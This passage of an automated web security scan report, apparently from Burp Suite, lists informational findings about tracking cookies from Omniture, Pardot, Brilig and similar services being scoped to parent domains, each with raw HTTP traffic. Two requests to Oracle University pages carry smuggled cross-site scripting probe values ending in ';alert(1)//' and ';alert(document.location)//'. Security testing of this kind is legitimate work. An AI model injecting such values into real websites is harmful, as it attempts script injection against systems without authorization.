GET /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025?AQB=1&ndh=1&t=6/8/2011%2016%3A2%3A20%202%20300&pageName=OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage%3Fpage_id%3D501&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Search%20Test&c20=New&v20=New&c22=%28db_pages.getpage%3Fpage_id%3D501%29&c38=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&c39=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:24 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664410-12E6-6E8221CD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www116
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A9%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:10 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664402-4052-4A49592A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www362
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569?[AQB]&ndh=1&t=6/8/2011%2016%3A1%3A43%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:44 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:01:44 GMT
Last-Modified: Wed, 07 Sep 2011 16:01:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6643E8-0CDE-17D956AD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A31%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%281%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(1)//43d7466ae8e
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:32 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:32 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664418-4A55-7F3D450F"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862?[AQB]&ndh=1&t=6/8/2011%2016%3A3%3A42%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%28document.location%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(document.location)//43d7466ae8e
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:03:43 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:03:43 GMT
Last-Modified: Wed, 07 Sep 2011 16:03:43 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66445F-60B9-40E5F551"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www368
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.42. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315321126439961%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 15:00:30 GMT
Set-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315321126439961&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8
Content-Length: 0
X-Brilig-D: D=3410
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain


12.43. http://pi.pardot.com/analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pi.pardot.com
Path:   /analytics

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analytics?ver=3&visitor_id=191471185&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: pi.pardot.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visitor_id3682=160859557; pardot=h5gc13lruog4br7fbhilcbhh31; visitor_id1852=191471185

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding,User-Agent
Content-Length: 680
Content-Type: text/javascript; charset=utf-8
Set-Cookie: pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
Set-Cookie: lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure
X-Pardot-LB: lb-d2
Connection: close

function piResponse() {
piSetCookie('visitor_id1852', '191471275', 3650);
if (document.location.protocol != "https:") {
var analytics_link = "http://" + "www2.znode.com/analytics?";
pi.tracker.visitor
...[SNIP]...

12.44. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/
Content-Length: 8286
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

12.45. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
